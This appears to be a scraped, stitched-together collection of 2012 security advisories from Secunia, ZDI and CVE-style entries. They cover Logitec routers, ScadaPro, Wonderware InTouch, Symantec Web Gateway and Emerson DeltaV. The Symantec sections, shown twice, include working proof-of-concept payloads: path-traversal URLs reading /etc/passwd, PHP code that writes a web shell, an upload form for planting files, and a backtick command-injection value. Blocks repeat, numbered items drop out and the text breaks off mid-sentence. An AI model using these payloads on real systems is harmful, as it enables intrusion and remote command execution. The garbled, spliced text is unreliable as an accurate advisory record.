https://ca.secunia.com/?page=viewadvisory&vuln_id=49289 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Logitec LAN-W300N/R, LAN-W300N/RS, and LAN-W300N/RU2, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is reported in firmware version 2.17. Other versions may also be affected. SOLUTION: Update to a fixed version (please see the vendor's advisory for details). ORIGINAL ADVISORY: Logitec (Japanese): http://www.logitec.co.jp/info/2012/0516.html?link_id=out_oshirase_20120516_2_2 JVN: http://jvn.jp/en/jp/JVN85934986/index.html http://jvndb.jvn.jp/en/contents/2012/JVNDB-2012-000051.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Untrusted search path vulnerability in Measuresoft ScadaPro Client before 4.0.0 and ScadaPro Server before 4.0.0 allows local users to gain privileges via a Trojan horse DLL in the current working directory. DLL It may be possible to get permission through the file. Measuresoft ScadaPro is a SCADA system for power, oil and gas, pharmaceutical and other companies. Measuresoft ScadaPro uses a fixed or controllable search path to discover resources, allowing unauthorized attackers to build malicious DLL files and loading malicious files before legitimate DLLs, which can cause arbitrary code to be executed in the context of the application. Measuresoft ScadaPro is prone to a vulnerability that lets attackers execute arbitrary code. An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file

slssvc.exe in Invensys Wonderware SuiteLink in Invensys InTouch 2012 and Wonderware Application Server 2012 allows remote attackers to cause a denial of service (resource consumption) via a long Unicode string, a different vulnerability than CVE-2012-3007. WonderWare is an industrial control and automation software. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Invensys Wonderware InTouch SuiteLink Service Denial of Service Vulnerability SECUNIA ADVISORY ID: SA49173 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49173/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49173 RELEASE DATE: 2012-05-16 DISCUSS ADVISORY: http://secunia.com/advisories/49173/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49173/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49173 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Luigi Auriemma has discovered a vulnerability in Invensys Wonderware InTouch, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error within the SuiteLink Service (slssvc.exe) when processing certain packets. This can be exploited to cause the service to crash via a specially crafted packet sent to TCP port 5413. The vulnerability is confirmed in version 10.1.300 Build 0268 (slssvc.exe version 51.5.0.0). Other versions may also be affected. SOLUTION: Restrict access to trusted hosts only. PROVIDED AND/OR DISCOVERED BY: Luigi Auriemma ORIGINAL ADVISORY: Luigi Auriemma: http://aluigi.altervista.org/adv/suitelink_1-adv.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data. Authentication is not required to exploit this vulnerability. The specific flaw exists due to insufficiently filtered user-supplied data used in a call to exec() in multiple script pages. The affected scripts are located in '/spywall/ipchange.php' and 'network.php'. There is also a flaw in '/spywall/download_file.php' that allows unauthenticated users to download and delete any file on the server. Symantec Web Gateway is a Web security gateway hardware appliance. Due to weak validation and lack of filtering of user control input, an attacker can inject arbitrary code into an application script and execute it with application privileges. Successful exploits will result in the execution of arbitrary attack-supplied commands in the context of the affected application. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. Software: Symantec Web Gateway Current Software Version: 5.0.2.8 Product homepage: www.symantec.com Author: S2 Crew [Hungary] CVE: CVE-2012-0297, CVE-2012-0298, ??? File include: https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd File include and OS command execution: http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd You can execute OS commands just include the error_log: /usr/local/apache2/logs/ -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log Make a connection to port 80: <?php $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w'); $cmd = "<?php system(\$_GET['cmd']); ?>"; fputs($f,$cmd); fclose($f); print "Shell creation done<br>"; ?> Arbitary file download and delete: https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog d parameter: the complete filename After the download process application removes the original file with root access! :) Command execution methods: 1.Method Download and delete the /var/www/html/ciu/.htaccess file. After it you can access the ciu interface on web. There is an upload script: /ciu/uploadFile.php User can control the filename and the upload location: $_FILES['uploadFile']; $_POST['uploadLocation']; 2.Method <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data"> <input type="file" name="uploadFile"> <input type="text" name="action" value="upload"> <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/"> <input type="hidden" name="configuration" value="test"> <input type="submit" value="upload!"> </form> The "/var/www/html/spywall/cleaner" is writeable by www-data. Command execution after authentication: http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove) From the modified POST message: Content-Disposition: form-data; name="pingaddress" 127.0.0.1`whoami>/tmp/1234.txt` . - -- Vendor Response: Symantec has issued an update to correct this vulnerability. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT9JkrlVtgMGTo1scAQK0Bwf+Ns64PZhwAAyfloBVx8Pb/6DTVjd8g1yp Xi5ynP006/9fLSnI2UACJdFJqUj0MPM6YUuOgpsGfncxVYVAc96pawv3pxfsfwfm kkAo2aUPIsx4xQP3Mtz3YNpWb8jl/L1SUiNLu4ogKhuA1y82gXIRot4wNq9s0DWr 11d8pTUgHJtPnlH43bWAvzqnnsf0OapaePuHEfOArEZK5kUBangirZSOyYiH+zfG Axl29pM2pLEC2ZNtJ/rbEaQhrG1chwt9+QIiQWRb5Z0V7FssO1M6AduMF7D71LoF HxgfwMBHPTlGJoWYb3LovAfDrlbeJm5sQGIabUha4TNUnAuInSURBQ== =fH5n -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Symantec Web Gateway Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49216 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49216/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 RELEASE DATE: 2012-05-18 DISCUSS ADVISORY: http://secunia.com/advisories/49216/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49216/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Symantec Web Gateway, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, manipulate certain data, and compromise a vulnerable system. 1) An unspecified error can be exploited to inject arbitrary commands. No further information is currently available. 2) Certain unspecified input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. 3) Certain unspecified input is not properly verified before being used to download or delete arbitrary files. This can be exploited to remove or disclose the contents of arbitrary files. 4) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities are reported in versions prior to 5.0.3. SOLUTION: Update to version 5.0.3. PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Tenable Network Security via ZDI and an anonymous person via SecuriTeam Secure Disclosure. 4) The vendor credits Ajay Pal Singh Atwal and an anonymous person. ORIGINAL ADVISORY: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors. Authentication is not required to exploit this vulnerability. The specific flaw exists because Symantec Web Gateway allows unauthenticated users to upload a file while preserving the file extension. Symantec Web Gateway is a Web security gateway hardware appliance. This may facilitate unauthorized access or OS command execution with elevated privileges; other attacks are also possible. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. - -- Vendor Response: Symantec has issued an update to correct this vulnerability. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT9JmIFVtgMGTo1scAQIcsggAiLXplifuJP03Yc8Z5FD6BofgxIpTW4pe A1bAHANbzqZUEOeK4+RO0/6xy7mN5urbMZiLRc/iW3GaCYkWBcUUZ1CyT//MsDZ7 vqkR/kWXENtCBUip76vICdAWWK87FvlZa6gZN/kAnj5RiGLZ1QCUddc9yBIApQ/B u87rKoIcrfccUsM0gwgy9qmbWS52I8hfOUMfXIJs5w+7k8mbIkDbnBR0gSh3bGe3 LMsOp2VxXEDx5Kc3/d53ldIASEQPbPAa4GyYkvrzGdSxACItij+4RDOaaszRrnZE QbPe7jqJKsxWW8wei+Y4MXIPzlV5QqpVA/NDeR74rF7JyPuLo6c1mA== =/0OU -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Symantec Web Gateway Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49216 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49216/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 RELEASE DATE: 2012-05-18 DISCUSS ADVISORY: http://secunia.com/advisories/49216/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49216/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Symantec Web Gateway, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, manipulate certain data, and compromise a vulnerable system. 1) An unspecified error can be exploited to inject arbitrary commands. No further information is currently available. 2) Certain unspecified input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. 3) Certain unspecified input is not properly verified before being used to download or delete arbitrary files. This can be exploited to remove or disclose the contents of arbitrary files. 4) Certain unspecified input is not properly sanitised before being returned to the user. The vulnerabilities are reported in versions prior to 5.0.3. SOLUTION: Update to version 5.0.3. PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Tenable Network Security via ZDI and an anonymous person via SecuriTeam Secure Disclosure. 4) The vendor credits Ajay Pal Singh Atwal and an anonymous person. ORIGINAL ADVISORY: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to (1) read or (2) delete arbitrary files via unspecified vectors. (1) Read or (2) A vulnerability exists that will be removed.Arbitrary file by a third party (1) Read or (2) It may be deleted. A vulnerability exists in Symantec Web Gateway. A successful exploit could render the system unusable. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. Software: Symantec Web Gateway Current Software Version: 5.0.2.8 Product homepage: www.symantec.com Author: S2 Crew [Hungary] CVE: CVE-2012-0297, CVE-2012-0298, ??? File include: https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd File include and OS command execution: http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd You can execute OS commands just include the error_log: /usr/local/apache2/logs/ -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log Make a connection to port 80: <?php $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w'); $cmd = "<?php system(\$_GET['cmd']); ?>"; fputs($f,$cmd); fclose($f); print "Shell creation done<br>"; ?> Arbitary file download and delete: https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog d parameter: the complete filename After the download process application removes the original file with root access! :) Command execution methods: 1.Method Download and delete the /var/www/html/ciu/.htaccess file. After it you can access the ciu interface on web. There is an upload script: /ciu/uploadFile.php User can control the filename and the upload location: $_FILES['uploadFile']; $_POST['uploadLocation']; 2.Method <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data"> <input type="file" name="uploadFile"> <input type="text" name="action" value="upload"> <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/"> <input type="hidden" name="configuration" value="test"> <input type="submit" value="upload!"> </form> The "/var/www/html/spywall/cleaner" is writeable by www-data. Command execution after authentication: http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove) From the modified POST message: Content-Disposition: form-data; name="pingaddress" 127.0.0.1`whoami>/tmp/1234.txt` . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Symantec Web Gateway Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49216 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49216/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 RELEASE DATE: 2012-05-18 DISCUSS ADVISORY: http://secunia.com/advisories/49216/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49216/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Symantec Web Gateway, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, manipulate certain data, and compromise a vulnerable system. 1) An unspecified error can be exploited to inject arbitrary commands. No further information is currently available. 2) Certain unspecified input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. This can be exploited to remove or disclose the contents of arbitrary files. 4) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities are reported in versions prior to 5.0.3. SOLUTION: Update to version 5.0.3. PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Tenable Network Security via ZDI and an anonymous person via SecuriTeam Secure Disclosure. 4) The vendor credits Ajay Pal Singh Atwal and an anonymous person. ORIGINAL ADVISORY: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

PORTSERV.exe in Emerson DeltaV and DeltaV Workstations 9.3.1, 10.3.1, 11.3, and 11.3.1 and DeltaV ProEssentials Scientific Graph 5.0.0.6 allows remote attackers to cause a denial of service (daemon crash) via a crafted (1) TCP or (2) UDP packet to port 111. Emerson Electric is a diversified global manufacturer. Provides network energy, process management, industrial automation, environmental optimization technology, tools and storage. Multiple DeltaV Products are prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to access or modify data, to exploit latent vulnerabilities in the underlying database, to execute arbitrary code, to overwrite arbitrary files on the victim's computer in the context of the vulnerable application that is using the ActiveX control (typically Internet Explorer),or to cause a denial-of-service condition. Other attacks are possible. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: DeltaV Products Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49210 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49210/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49210 RELEASE DATE: 2012-05-17 DISCUSS ADVISORY: http://secunia.com/advisories/49210/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49210/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49210 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in DeltaV products, which can be exploited by malicious people to conduct cross-site scripting attacks, SQL injection attacks, cause a DoS (Denial of Service), and compromise a vulnerable system. 1) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Certain unspecified input is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 4) An error within the processing of certain fields in project files can be exploited to cause a buffer overflow via a specially crafted project file. 5) An insecure method within an ActiveX control can be exploited to overwrite arbitrary files. Successful exploitation of vulnerabilities #4 and #5 may allow execution of arbitrary code. The vulnerabilities are reported in the following applications: * DeltaV and DeltaV Workstations versions 9.3.1, 10.3.1, 11.3, and 11.3.1 * DeltaV ProEssentials Scientific Graph version 5.0.0.6 SOLUTION: Apply hotfix (please contact the vendor for more information). PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Kuang-Chun Hung, Security Research and Service Institute. ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-12-137-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-site scripting (XSS) vulnerability in Emerson DeltaV and DeltaV Workstations 9.3.1, 10.3.1, 11.3, and 11.3.1 and DeltaV ProEssentials Scientific Graph 5.0.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Emerson Electric is a diversified global manufacturer. Provides network energy, process management, industrial automation, environmental optimization technology, tools and storage. There are cross-site scripting vulnerabilities in multiple Emerson Electric DeltaV products that allow an attacker to exploit a vulnerability to build a malicious web page, entice a user to resolve, obtain sensitive information, or hijack a user session. Multiple DeltaV Products are prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to access or modify data, to exploit latent vulnerabilities in the underlying database, to execute arbitrary code, to overwrite arbitrary files on the victim's computer in the context of the vulnerable application that is using the ActiveX control (typically Internet Explorer),or to cause a denial-of-service condition. Other attacks are possible. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: DeltaV Products Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49210 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49210/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49210 RELEASE DATE: 2012-05-17 DISCUSS ADVISORY: http://secunia.com/advisories/49210/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49210/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49210 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in DeltaV products, which can be exploited by malicious people to conduct cross-site scripting attacks, SQL injection attacks, cause a DoS (Denial of Service), and compromise a vulnerable system. 1) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Certain unspecified input is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 3) An error within PORTSERV.exe can be exploited to cause a crash via a specially crafted packet sent to TCP or UDP port 111. 4) An error within the processing of certain fields in project files can be exploited to cause a buffer overflow via a specially crafted project file. 5) An insecure method within an ActiveX control can be exploited to overwrite arbitrary files. Successful exploitation of vulnerabilities #4 and #5 may allow execution of arbitrary code. The vulnerabilities are 